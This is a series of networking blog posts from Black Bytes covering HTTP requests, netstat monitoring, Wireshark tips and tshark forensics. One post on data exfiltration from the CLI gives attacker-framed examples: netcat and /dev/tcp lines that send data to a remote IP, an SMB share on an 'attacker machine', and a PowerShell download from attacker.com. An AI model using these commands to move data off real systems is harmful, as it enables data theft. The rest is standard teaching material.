Every time you click on a link or directly type an address, a number of steps have to happen for the site to show on your screen. It may be a bit intimidating because multiple protocols and servers are involved in the process. In reality it’s not that hard, so please follow me and let’s dive in!

It all starts with one packet

The first thing your browser needs to do when you click that link is resolving the domain name to an ip address. It does this by using the Domain Name System (DNS). This protocol will allow the browser to get the server ip address. DNS works via the UDP transport protocol, but TCP is also an option.

Most operating systems have tools to manually resolve a host name. Here is an example using the host command in Linux.

In wireshark you can use the ‘dns’ display filter to find dns request.

The initial connection

Once the browser has the ip address it can open a connection against the web server. To do this it uses the TCP/IP protocol and by default it will connect to port 80. A TCP/IP request is started using the “three-way handshake”.

This is a sequence of three TCP packets that carry the following flags: SYN / SYN-ACK / ACK. We can see this in wireshark using the ‘tcp’ display filter.

The http request

The next step in our journey is to tell the web server what page we want. The browser will have to prepare an http get request asking for that page. This is what a minimal http request looks like:

GET / HTTP/1.1
Host: www.blackbytes.info

In fact, you can try this at home if you have netcat or a similar program, you can just copy and paste this request. Hit enter twice and you will get a bunch of HTML.

Of course, there is an easier way, as having to build a http request manually every time can be a bit tiresome. You can use the curl tool to make a http request for you, curl has  some useful options to help you, for example with -I it will just grab the HTTP headers and show them to you. This can be very helpful in a troubleshooting scenario.

You can use the ‘http’ display filter in wireshark to show only http requests. There are also a number of tools that act as a proxy and allow you to see and even modify request as they are being made by your browser. Examples of this are fiddler and burp proxy.

Redirected

If the http response code is not ‘200 OK’ it means there was some problem with the request. The code can help us and the browser determine what’s wrong. In the case of a 301/302 it means the resource is somewhere else. The browser will have to send a new request, but this time for the resource indicated by the ‘Location’ header. Thankfully it won’t need to restart the whole process again if Keep Alive is enabled.

The last steps

There are a few more steps that the browser doesn’t have to worry about, for example, there might be a load balancer between the actual web servers and the server you are connecting to. Once the response is received the browser will start parsing the HTML and opening up a few more connections. Modern browsers can open up to 6 connections to download assets (like images or css files) in parallel.

The post Life of a web request appeared first on Black Bytes.

-a all
-n show ip instead of host names
-t show only tcp connections
-p show process id/name

Another command that will give you similar results is: lsof -nPi

What if you wanted to see the 10 ip addresses with the most connection to your server? You could use a one-liner like this one I came up with:

netstat -ant | grep -i establ | awk -F" " '{print $5}' | cut -d':' -f 1 | sort -n | uniq -c | sort -nr | head -n10

You can also see the connections live as they are being made. For that you can use the “watch” command, which will re-run any command every X seconds (by default 2 seconds) and show you the output. So if you wanted to see all the connections for port 80 updated every five seconds you would do this:

watch -n5 "netstat -antp | grep :80"

There are other tools that also let you see live connections, and even get an idea of the traffic you are getting. These tools are iptraf and iftop . If you need to see the actual data going through your network you will need a packet sniffer like tcpdump or wireshark.

Related posts:
Tshark network forensics

The post Watching your network appeared first on Black Bytes.

Generic

Samba can be configured on the attacker machine so that you can connect from the vulnerable
machine using the “net use” (windows) or “mount -t cifs” (linux) commands and then transfer files.

example:
net use z: \\192.168.1.20 /u:attacker

smb.conf http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way we can do this, but remember that both the data and the login credentials travel in plain text, also since the client is interactive if you have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of ftp, it uses UDP and it doesn’t support authentication, a popular tftp server is Tftpd32. It’s still in use for things like backing up a router configuration or uploading the latest firmware.

SSH will allow us to transfer data in a safe manner, we can use the scp command to transfer files via ssh.

Netcat is also an option, it is usually available in most linux distributions, and there is also a
windows version. If you need encryption then you should try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

Linux specific

On linux you can use /dev/tcp/<host>/<port> to open connections to other host (you need to use a recent version of Bash for this to work), then we can use netcat to capture this data on the other end.

example:
echo secret_data.txt > /dev/tcp/192.168.1.20/500

Windows specific

In windows we can use powershell to open tcp connections, or download files from http.

example:

$http = New-Object System.Net.WebClient

    $url  = "http://www.attacker.com"
    $file = "test.html"

    $http.DownloadFile($url, $file)

As you can see there are many ways for transferring files, so pick the one that suits you best and enjoy!

The post Data exfiltration from the CLI appeared first on Black Bytes.

Protocol statistics + Apply as filter

To get a sense of the kind of traffic you have on a packet capture session you can use the protocol statistics window. To open it go to Statistics > Protocol Hierarchy. If you see some traffic that shouldn’t be there you can just right-click and apply as filter to zoom in and see what’s going on.

Saving and removing display filters

One of the features you will be using more often in Wireshark is display filters, so anything that makes working with them easier is great. You can save common filters as a button that you can click for quick access, to do this enter your filter and then click ‘Save’, give it a name and you are done!

You might also want to remove or rename some of your saved filters, for that you can go to Edit > Preferences > Filter Expressions.

Using time references

As you may know you can view the time column in different formats, the most useful ones are ‘time since last packet’, and ‘time since start of capture’.

What if you wanted to know how long it took between 2 specific packets that aren’t one after the other? Well that’s what time references are for! Select your starting packet and press Control + T, if it asks you to switch time format say ‘yes’, then you will be able to see what you wanted.

Hope you found that useful, if you have any other cool Wireshark tips please leave a comment

The post Wireshark: Quick tips appeared first on Black Bytes.

Extracting host names with tshark

Since we are dealing with mostly http traffic we may be interested in the sites that have been visited. To obtain this information we can use the http.host field and then a bit of sorting and this will show us the top 10 sites.

tshark -T fields -e http.host -r tor.pcap > dns.txt
cat dns.txt | sort | uniq -c | sort -nr | head

User agents

tshark -R 'http contains "User-Agent:"' -T fields -e http.user_agent -r tor2b.pcap | sort | uniq -c | sort -nr | less

The option -R allows us to define display filters, in the same way we would in wireshark. You can find a list of useful display filters here.

Email address

Another interesting bit of data are email addresses, which we can extract by using a regexp on the raw data.

tshark -r tor.pcap -R "data-text-lines" -T fields -e text > alldata.txt
grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' alldata.txt | sort | uniq

Requested urls

We can also get a list of all the requested URLs (via the GET method):

tshark -r http-traffic.pcap -T fields -e http.host -e http.request.uri -Y 'http.request.method == "GET"' | sort | uniq | less

Don’t forget to take a look at the official documentation.

The post Network forensics with tshark appeared first on Black Bytes.